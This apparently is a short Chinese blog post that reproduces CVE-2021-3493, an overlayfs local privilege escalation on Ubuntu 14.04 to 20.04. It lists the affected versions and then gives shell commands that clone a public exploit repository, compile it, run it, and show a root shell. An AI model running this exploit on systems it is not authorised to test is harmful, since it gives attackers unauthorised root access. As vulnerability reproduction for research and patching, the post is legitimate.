CVE-2021-3493：overlayfs提权

漏洞简介

Linux 内核中 overlayfs 文件系统是 Ubuntu 的特定问题，由于没有正确的验证文件系统功能在用户名称空间中的应用，从而导致攻击者可以安装一个允许未授权挂载的 overlayfs 修补程序来提升权限

影响版本

ubuntu 20.04

ubuntu 16.04

ubuntu18.04

ubuntu 14.04

本次复现为ubuntu20.04版本

漏洞复现

test@linux:~# git clone https://github.com/ASkyeye/CVE-2021-3493.git
test@linux:~$ cd CVE-2021-3493/
test@linux:~/CVE-2021-3493$ gcc exploit.c -o exploit
test@linux:~/CVE-2021-3493$ chmod u+x exploit
test@linux:~/CVE-2021-3493$ ./exploit
bash-5.0$ whoami
root

posted @ 2021-04-28 23:52 徐野子阅读(1208) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

徐野子

CVE-2021-3493：overlayfs提权

漏洞简介

影响版本

漏洞复现

公告